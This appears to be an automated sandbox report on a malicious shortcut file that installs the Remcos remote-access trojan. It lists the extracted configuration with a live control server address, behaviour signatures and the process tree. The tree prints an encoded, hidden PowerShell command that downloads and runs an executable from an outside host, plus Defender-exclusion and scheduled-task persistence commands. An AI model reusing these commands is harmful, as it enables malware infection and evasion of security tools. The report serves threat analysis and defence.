Analysis
- max time kernel: 147s
- max time network: 140s
- platform: windows10-2004_x64
- resource: win10v2004-20240709-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240709-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 26-07-2024 12:01
Static task
static1
Behavioral task
behavioral1
Sample
MalwareBazaar.lnk
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
MalwareBazaar.lnk
Resource
win10v2004-20240709-en
General
-
Target
MalwareBazaar.lnk
-
Size
2KB
-
MD5
a38b0a4d0768ba8ce7c73904b55ee9ff
-
SHA1
a1a13ef45fcf88eaff3dcffba1fb2608aa07e3c8
-
SHA256
3f2491926888db2c9d6c7b1a426ff41e1cd4a13bc922156a814b9fe3032ff809
-
SHA512
4159cd37110d910624b8bb5c837e70668b3e6d795e1ab276ea32f5ab315509dedf11bd865d4c1be41f9cec698235453996939a0ac8a45f36a28a45bdf28b7cf8
Malware Config
Extracted
remcos
RemoteHost
204.10.160.230:7983
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-O7QOC3
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
startup_value
Remcos
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
  flow  pid   process
  9     4972  powershell.exe
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
Processes:
  pid   process
  4972  powershell.exe
  3616  powershell.exe
  2244  powershell.exe
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
  description        ioc                                                                                                     process
  Key value queried  \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Control Panel\International\Geo\Nation  cmd.exe
  Key value queried  \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Control Panel\International\Geo\Nation  PuttyTest777.pif
-
Executes dropped EXE 3 IoCs
Processes:
  pid   process
  1156  PuttyTest777.pif
  1180  PuttyTest777.pif
  4568  PuttyTest777.pif
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
  description                          pid   process           target process
  PID 1156 set thread context of 4568  1156  PuttyTest777.pif  PuttyTest777.pif
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
  description  ioc                                                          process
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  schtasks.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  PuttyTest777.pif
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  PuttyTest777.pif
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
  pid   process
  4972  powershell.exe
  4972  powershell.exe
  1156  PuttyTest777.pif
  1156  PuttyTest777.pif
  1156  PuttyTest777.pif
  1156  PuttyTest777.pif
  1156  PuttyTest777.pif
  1156  PuttyTest777.pif
  3616  powershell.exe
  3616  powershell.exe
  2244  powershell.exe
  2244  powershell.exe
  1156  PuttyTest777.pif
  1156  PuttyTest777.pif
  1156  PuttyTest777.pif
  1156  PuttyTest777.pif
  2244  powershell.exe
  3616  powershell.exe
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
  description              pid   process
  Token: SeDebugPrivilege  4972  powershell.exe
  Token: SeDebugPrivilege  1156  PuttyTest777.pif
  Token: SeDebugPrivilege  3616  powershell.exe
  Token: SeDebugPrivilege  2244  powershell.exe
-
Suspicious use of WriteProcessMemory 31 IoCs
Processes:
  description                       pid   process           target process
  PID 5116 wrote to memory of 844   5116  cmd.exe           cmd.exe
  PID 5116 wrote to memory of 844   5116  cmd.exe           cmd.exe
  PID 844 wrote to memory of 4972   844   cmd.exe           powershell.exe
  PID 844 wrote to memory of 4972   844   cmd.exe           powershell.exe
  PID 4972 wrote to memory of 1156  4972  powershell.exe    PuttyTest777.pif
  PID 4972 wrote to memory of 1156  4972  powershell.exe    PuttyTest777.pif
  PID 4972 wrote to memory of 1156  4972  powershell.exe    PuttyTest777.pif
  PID 1156 wrote to memory of 3616  1156  PuttyTest777.pif  powershell.exe
  PID 1156 wrote to memory of 3616  1156  PuttyTest777.pif  powershell.exe
  PID 1156 wrote to memory of 3616  1156  PuttyTest777.pif  powershell.exe
  PID 1156 wrote to memory of 2244  1156  PuttyTest777.pif  powershell.exe
  PID 1156 wrote to memory of 2244  1156  PuttyTest777.pif  powershell.exe
  PID 1156 wrote to memory of 2244  1156  PuttyTest777.pif  powershell.exe
  PID 1156 wrote to memory of 4808  1156  PuttyTest777.pif  schtasks.exe
  PID 1156 wrote to memory of 4808  1156  PuttyTest777.pif  schtasks.exe
  PID 1156 wrote to memory of 4808  1156  PuttyTest777.pif  schtasks.exe
  PID 1156 wrote to memory of 1180  1156  PuttyTest777.pif  PuttyTest777.pif
  PID 1156 wrote to memory of 1180  1156  PuttyTest777.pif  PuttyTest777.pif
  PID 1156 wrote to memory of 1180  1156  PuttyTest777.pif  PuttyTest777.pif
  PID 1156 wrote to memory of 4568  1156  PuttyTest777.pif  PuttyTest777.pif
  PID 1156 wrote to memory of 4568  1156  PuttyTest777.pif  PuttyTest777.pif
  PID 1156 wrote to memory of 4568  1156  PuttyTest777.pif  PuttyTest777.pif
  PID 1156 wrote to memory of 4568  1156  PuttyTest777.pif  PuttyTest777.pif
  PID 1156 wrote to memory of 4568  1156  PuttyTest777.pif  PuttyTest777.pif
  PID 1156 wrote to memory of 4568  1156  PuttyTest777.pif  PuttyTest777.pif
  PID 1156 wrote to memory of 4568  1156  PuttyTest777.pif  PuttyTest777.pif
  PID 1156 wrote to memory of 4568  1156  PuttyTest777.pif  PuttyTest777.pif
  PID 1156 wrote to memory of 4568  1156  PuttyTest777.pif  PuttyTest777.pif
  PID 1156 wrote to memory of 4568  1156  PuttyTest777.pif  PuttyTest777.pif
  PID 1156 wrote to memory of 4568  1156  PuttyTest777.pif  PuttyTest777.pif
  PID 1156 wrote to memory of 4568  1156  PuttyTest777.pif  PuttyTest777.pif
Processes
-
C:\Windows\system32\cmd.exe
  command line: cmd /c C:\Users\Admin\AppData\Local\Temp\MalwareBazaar.lnk
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID: 5116
-
  C:\Windows\System32\cmd.exe
    command line: "C:\Windows\System32\cmd.exe" cMD /c PowErsHell -EX bypAss -nOp -w hidden -eC IAAJAEkATgB2AG8ASwBFAC0AdwBFAGIAUgBlAHEAVQBFAHMAVAAgAC0AVQBSAGkAIAAJAB0gaAB0AHQAcABzADoALwAvAHIAZQBtAGkAcwBhAHQALgBjAG8AbQAuAHUAeQAvAHoAdABpAC8AaABvAHQALgBlAHgAZQAdICAALQBvAHUAVABGAGkATABlACAACQAdICQAZQBuAFYAOgBhAFAAcABkAGEAdABhAFwAUAB1AHQAdAB5AFQAZQBzAHQANwA3ADcALgBwAGkAZgAdICAAIAA7ACAACQBpAE4AdgBvAGsARQAtAGkAVABlAG0AIAAJAB0gJABFAG4AdgA6AGEAcABQAEQAYQB0AEEAXABQAHUAdAB0AHkAVABlAHMAdAA3ADcANwAuAHAAaQBmAB0g
    - Suspicious use of WriteProcessMemory
    PID: 844
-
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      command line: PowErsHell -EX bypAss -nOp -w hidden -eC IAAJAEkATgB2AG8ASwBFAC0AdwBFAGIAUgBlAHEAVQBFAHMAVAAgAC0AVQBSAGkAIAAJAB0gaAB0AHQAcABzADoALwAvAHIAZQBtAGkAcwBhAHQALgBjAG8AbQAuAHUAeQAvAHoAdABpAC8AaABvAHQALgBlAHgAZQAdICAALQBvAHUAVABGAGkATABlACAACQAdICQAZQBuAFYAOgBhAFAAcABkAGEAdABhAFwAUAB1AHQAdAB5AFQAZQBzAHQANwA3ADcALgBwAGkAZgAdICAAIAA7ACAACQBpAE4AdgBvAGsARQAtAGkAVABlAG0AIAAJAB0gJABFAG4AdgA6AGEAcABQAEQAYQB0AEEAXABQAHUAdAB0AHkAVABlAHMAdAA3ADcANwAuAHAAaQBmAB0g
      - Blocklisted process makes network request
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 4972
-
      C:\Users\Admin\AppData\Roaming\PuttyTest777.pif
        command line: "C:\Users\Admin\AppData\Roaming\PuttyTest777.pif"
        - Checks computer location settings
        - Executes dropped EXE
        - Suspicious use of SetThreadContext
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        PID: 1156
-
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\PuttyTest777.pif"
          - Command and Scripting Interpreter: PowerShell
          - System Location Discovery: System Language Discovery
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 3616
-
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\HODoCxSdp.exe"
          - Command and Scripting Interpreter: PowerShell
          - System Location Discovery: System Language Discovery
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 2244
-
        C:\Windows\SysWOW64\schtasks.exe
          command line: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HODoCxSdp" /XML "C:\Users\Admin\AppData\Local\Temp\tmp34A7.tmp"
          - System Location Discovery: System Language Discovery
          - Scheduled Task/Job: Scheduled Task
          PID: 4808
-
        C:\Users\Admin\AppData\Roaming\PuttyTest777.pif
          command line: "C:\Users\Admin\AppData\Roaming\PuttyTest777.pif"
          - Executes dropped EXE
          PID: 1180
-
        C:\Users\Admin\AppData\Roaming\PuttyTest777.pif
          command line: "C:\Users\Admin\AppData\Roaming\PuttyTest777.pif"
          - Executes dropped EXE
          - System Location Discovery: System Language Discovery
          PID: 4568
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize 2KB
MD5 968cb9309758126772781b83adb8a28f
SHA1 8da30e71accf186b2ba11da1797cf67f8f78b47c
SHA256 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA512 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize 18KB
MD5 3cbb110c8306765af14935b87faff53d
SHA1 b43050dbfa09f262ebf9dff16bc84d7ffd1085ef
SHA256 67a9513894b6467f486f0e5bb6c14c9fb3167869f263da8512c7ae8ba69689fd
SHA512 ffc1c58e2e6c3a51c893038b2907dca431731f68ded1b96fab5bf7382191979732ed9cf374277675fa01dc057f1739a54692266599ddf54676b791e72f7bf9cc
-
Filesize 1KB
MD5 de6aa76f93d4b52a199d3c98d970e110
SHA1 04ddc85a8c120fecab8623fe4138a508928d08db
SHA256 ddcd2e80e82a9efc63f8a8bac854e8e4f942c7bd4b49266cf8f4be13883294b2
SHA512 43a0aaf20d756287f0fcb0d00de557b18b1f1127a8feebaf9ccb55218c7dcc484d06494f5015855fcdb72da9b34cb77e2e8792bf57afc2a3cd7eeefa5c6bb74c
-
Filesize 60B
MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize 1KB
MD5 1802e375559eb1ff0f19e9f9f9ebce9d
SHA1 56e4885282b51d273a5c4fb8edcdb93308468c5e
SHA256 74f756deec820dc45eda8b288931688cbbbb4f0e1694cd62a21d47e4d9c5817e
SHA512 8cdc265b19a7f966eb0bd9524663d50b24247e3a80b5d0678094f07bd7cbad3dd414957db2614780dca9410de6c3aabee9aab109d3da1ed0f8508777c9dc969e
-
Filesize 939KB
MD5 3f69729a8f2b22e625bb984f28758ebc
SHA1 ab8aab5952dfcf0d705daff76448920c67b6241d
SHA256 d1b50fc6ce79320a88defef33baf6a51e30845bd13ab2b52f7925ba0b8f527cd
SHA512 c4622e82f66aa728ded76ef628bd31ddcd35581a10a6043e735e557a26c8f9c72c67713f29a3ed90f647bf268484b44cf812918a02aa8e1539c3fdac7bcc1fa1